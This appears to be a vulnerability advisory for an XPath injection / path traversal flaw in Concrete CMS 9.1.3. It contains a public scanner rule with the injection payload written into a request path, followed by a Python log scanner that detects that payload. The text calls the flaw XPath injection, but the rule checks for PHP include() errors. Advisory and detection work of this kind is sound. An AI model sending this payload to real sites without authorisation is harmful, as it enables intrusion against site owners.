concretecms-9-1-3-xpath-injection: concretecms-9.1.3 - XPath Injection - File Path Traversal

Date: 2025-09-01 | Affected software: concretecms-9-1-3 | POC: public

Vulnerability description

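URL path folder 3 appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in URL path folder 3, and an XPath error message was returned. An attacker can exploit this vulnerability by sending a large number of requests to the system until they receive the actual paths of all of the system's content, which is stored on some internal or external servers.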

PoC code [public]

id: concretecms-9-1-3-xpath-injection

info:
  name: concretecms-9.1.3 - XPath注入 - 文件路径遍历
  author: nu11secur1ty
  severity: high
  verified: false
  description: URL 路径文件夹3似乎容易受到 XPath 注入攻击。测试payload 50539478' or 4591=4591--提交到URL路径文件夹3,返回XPath错误信息。攻击者可以利用此漏洞向系统发出大量请求,直到他收到该系统所有内容的实际路径,这些内容存储在某些内部或外部服务器上。
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3

rules:
  r0:
    request:
      method: GET
      path: /index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
    expression: response.status == 500 && response.body.bcontains(b'include():') && response.body.bcontains(b'Failed opening') && response.body.bcontains(b'ErrorException:')
expression: r0()
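
For defenders, the request shape the rule above sends (a quote followed by a numeric tautology inside a URL path segment, answered with HTTP 500) can be looked for in web server access logs. The following is an added example, not part of the original PoC or of Concrete CMS; the log format (combined log format), the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Quote followed by "or <n>=<n>", as in the page's test payload
# 50539478' or 4591=4591--
TAUTOLOGY = re.compile(r"""['"]\s*or\s+(\d+)\s*=\s*(\d+)""", re.IGNORECASE)

# Minimal combined-log-format parser: request target and status code only.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_segments(target):
    """Return percent-decoded path segments containing a quote + tautology."""
    path = target.split("?", 1)[0]          # only the path is of interest here
    hits = []
    for segment in path.split("/"):
        decoded = unquote(segment)
        match = TAUTOLOGY.search(decoded)
        # Both sides of the comparison must be the same number (always true).
        if match and match.group(1) == match.group(2):
            hits.append(decoded)
    return hits

def scan(lines):
    """Return one finding per log line whose path carries the pattern."""
    findings = []
    for line in lines:
        parsed = LOG_LINE.search(line)
        if not parsed:
            continue
        segments = suspicious_segments(parsed.group("target"))
        if segments:
            status = int(parsed.group("status"))
            findings.append({
                "target": parsed.group("target"),
                "status": status,
                "segments": segments,
                # A 5xx answer means the server may have returned error details.
                "error_response": status >= 500,
            })
    return findings

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2025:10:00:00 +0000] "GET /index.php/dashboard HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Sep/2025:10:00:02 +0000] "GET /index.php/ccm50539478\'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1" 500 2310',
    '198.51.100.4 - - [01/Sep/2025:10:00:05 +0000] "GET /blog/o\'reilly-or-not HTTP/1.1" 200 830',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `error_response` set is the case the rule's expression checks for, so it is also worth confirming that the application does not return PHP error text to clients.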
